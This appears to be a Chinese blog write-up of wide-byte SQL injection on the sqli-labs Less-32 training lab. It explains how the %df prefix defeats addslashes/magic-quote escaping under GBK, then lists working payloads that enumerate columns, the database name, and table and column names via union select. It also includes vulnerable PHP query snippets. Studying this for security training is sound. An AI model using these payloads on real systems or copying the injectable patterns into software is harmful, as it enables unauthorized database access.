SQL注入 - 宽字节注入

文章目录

SQL注入 - 宽字节注入

靶场 sqli - labs less-32

宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入

宽字节注入前置知识

php 5.4 以下低版本,修改配置文件然后强制执行,使用 magic_quotes_gpc 函数转义

php 复制代码
<?php
$a = "select * from admin where id ='$_REQUEST[8]'";
echo $a;
?>

php 5.4 以上高版本,删除掉了这个配置,通过特定函数使用addslashes() 函数转义

php 复制代码
<?php
$b = addslashes($_REQUEST[8]);
$a = "select * from admin where id ='$b'";
echo $a;
?>

SQL注入的核心是 闭合引号,注释后面的引号,让我们的输入跳出单双引号

sql 复制代码
select * from users where id='1' 

魔术引号的核心意义是不让你闭合,通过反斜杠转义你输入的单双引号反斜杠等

复制代码
绕过方法:
1、寻找不需要闭合的地方,如传参类型为init还是varchar
2、仔细查看作用域($_server)
3、宽字节注入

宽字节

两个单字节可以变为双字节,如:

复制代码
select * from users where id='1?/''

如数据库采用gbk编码方式,?/ 被解释成汉字则,' 会被逃逸出来

靶场实战

判断是否存在SQL注入

?id=1' and 1=1 ?id=1' and 1=2 发现被反斜杠转义了

复制代码
?id=1' and 1=1 --+
?id=1' and 1=2 --+

使用%df 进行宽字节注入绕过,发现存在SQL注入

复制代码
/ = 5c
%df = df
df5c = 運 (GBK编码字符)

?id=1%df' and 1=1 --+
?id=1%df' and 1=2 --+

判断位数

order by 语句可得 位数为3

复制代码
?id=1%df' order by 4 --+

判显错位

判断可得2,3

复制代码
?id=-1%df' union select 1,2,3 --+

判库名

判断可得 security

复制代码
?id=-1%df' union select 1,2,database() --+

判表名

复制代码
?id=-1%df' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 --+

判列名

复制代码
?id=-1%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 0,1 --+

0x7573657273(16进制) = users
相关推荐
踏月的造梦星球1 小时前
DMDPC 学习:架构、部署、运维与调优
运维·数据库·学习·架构
韩楚风2 小时前
【参天引擎】事务生命周期 / MVCC / Undo / ACID / 分布式事务 功能域整体解析
数据库·分布式·mysql·架构·cantian
renhongxia12 小时前
世界模型,是“空中楼阁”还是AGI的“最后一块拼图”?
运维·服务器·数据库·人工智能·算法·agi
程序员无隅3 小时前
Coding Agent 为什么压缩上下文后还能继续工作?上下文模块设计拆解
java·开发语言·数据库
愿做无知一猿3 小时前
Nacos连接MySQL异常?DataGrip竟成救星
数据库·mysql
G.O.G.O.G3 小时前
LeetCode SQL 从入门到精通(MySQL)06(上)
数据库·sql·mysql·leetcode
研究员子楚4 小时前
GEO行业发展标准体系白皮书V2.0-第10卷 · 全球篇:跨国标准协同与全球品牌语义治理框架
数据库·人工智能·microsoft·架构·geo
Omics Pro4 小时前
深度学习多组学互作:组内+组间
数据库·人工智能·深度学习·mysql·搜索引擎·自然语言处理
csdn_aspnet5 小时前
GitHub Actions自动化运维实战,用CI/CD流水线实现测试、部署、安全扫描一体化
运维·安全·ci/cd·自动化·github
2501_915106325 小时前
TraceEagle 代理抓包教程 本机和手机的 HTTPS 抓包方法
网络协议·计算机网络·网络安全·ios·adb·https·udp